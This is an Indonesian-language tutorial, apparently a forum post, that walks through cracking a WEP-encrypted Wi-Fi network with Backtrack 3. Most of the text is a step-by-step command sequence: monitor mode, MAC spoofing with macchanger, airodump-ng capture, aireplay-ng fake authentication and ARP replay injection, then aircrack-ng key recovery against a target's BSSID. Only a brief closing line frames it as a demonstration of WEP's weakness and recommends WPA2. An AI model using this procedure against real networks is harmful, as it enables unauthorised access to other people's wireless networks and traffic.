Persyaratan:
* Backtrack 3 pada CD atau USB
* Komputer dengan kartu nirkabel yang kompatibel 802.11
* Wireless Access point atau WIFI Router menggunakan enkripsi WEP
Saya akan menganggap bahwa Anda telah didownload dan boot ke Backtrack 3. Jika Anda belum mengetahuinya bagian, Anda mungkin tidak seharusnya mencoba u...ntuk memecahkan kunci WEP. Setelah Backtrack dimuat, buka shell dan lakukan hal berikut:
Mempersiapkan Kartu WIFI
Pertama kita harus mengaktifkan "Monitor Mode" pada kartu wifi. Jika menggunakan Intel ® PRO / Wireless 3945ABG masalah perintah berikut commands::
modprobe -r iwl3945
modprobe ipwraw
Perintah di atas akan mengaktifkan mode monitor pada chipset nirkabel di komputer Anda. Selanjutnya kita harus menghentikan kartu WIFI:
iwconfig
Catatlah nama antarmuka adaptor nirkabel Anda. Kemudian berhenti adaptor dengan menerbitkan:
airmon-ng stop [device]
atau
ifconfig down [interface]
Sekarang kita harus mengubah alamat MAC dari adapter:
macchanger --mac 00:11:22:33:44:66 [device]
Sekarang kita harus mengubah alamat MAC dari adapter:
airmon-ng start [device]
#http://a6.sphotos.ak.fbcdn.net/hphotos-ak-snc6/181709_162785347106660_100001255879652_364119_4260612_n.jpg
Menyerang Target
Sekarang waktu untuk menemukan yang cocok WEP memungkinkan jaringan untuk bekerja dengan:
airodump-ng [device]
#http://a7.sphotos.ak.fbcdn.net/hphotos-ak-ash1/167177_162785727106622_100001255879652_364129_4874802_n.jpg
Pastikan untuk mencatat alamat MAC (BSSID), saluran (CH) dan nama (ESSID) jaringan target. Sekarang kita harus mulai mengumpulkan data dari titik akses WIFI atas serangan tersebut:
airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]
#http://a3.sphotos.ak.fbcdn.net/hphotos-ak-snc6/166797_162786057106589_100001255879652_364134_5234660_n.jpg
Perintah di atas akan dikumpulkan data keluaran ke file: network.out. File ini akan dimasukkan ke dalam program Crack WEP saat kita siap untuk memecahkan kunci WEP.
Buka shell lain dan meninggalkan perintah sebelumnya berjalan. Sekarang kita perlu untuk menghasilkan beberapa paket palsu ke jalur akses untuk mempercepat output data. Uji titik akses dengan menerbitkan perintah berikut:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
#http://a5.sphotos.ak.fbcdn.net/hphotos-ak-ash1/181766_162786617106533_100001255879652_364140_8165058_n.jpg
Jika perintah ini berhasil, kami akan menghasilkan banyak paket pada jaringan target sehingga kita bisa memecahkan KUNCI tersebut. Tipe:
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
#http://a6.sphotos.ak.fbcdn.net/hphotos-ak-snc6/168487_162787180439810_100001255879652_364144_1619522_n.jpg
Hal ini akan memaksa jalur akses untuk mengirim segudang paket yang kita kemudian dapat digunakan untuk memecahkan kunci WEP. Periksa shell anda aerodump-ng dan anda akan melihat "data" bagian mengisi dengan paket.
#http://a4.sphotos.ak.fbcdn.net/hphotos-ak-snc6/168063_162787467106448_100001255879652_364145_1311146_n.jpg
Setelah sekitar 10,000-20,000 Anda dapat mulai retak kunci WEP. Jika tidak ada host lain pada paket target menghasilkan jalur akses, Anda dapat mencoba:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
#http://a8.sphotos.ak.fbcdn.net/hphotos-ak-snc6/167278_162787790439749_100001255879652_364147_94223_n.jpg
Setelah Anda memiliki paket cukup, Anda mulai retak:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
The "-n 128" menandakan sebuah kunci WEP 128-bit. Jika retak gagal, coba kunci 64-bit dengan mengubah nilai N ke 64.
#http://a6.sphotos.ak.fbcdn.net/hphotos-ak-ash1/179619_162788263773035_100001255879652_364150_2992776_n.jpg
Setelah memecahkan berhasil, Anda akan ditinggalkan dengan KUNCI itu! Lepaskan: dari output dan ada kunci Anda. Jadi di sana Anda memilikinya.
Dapat menggunakan teknik ini untuk menunjukkan kepada orang lain mengapa menggunakan WEP adalah ide yang buruk. Saya sarankan anda menggunakan enkripsi WPA2 pada jaringan nirkabel Anda.
jangan pernah anda bertaya tapi pahamin apa yang anda baca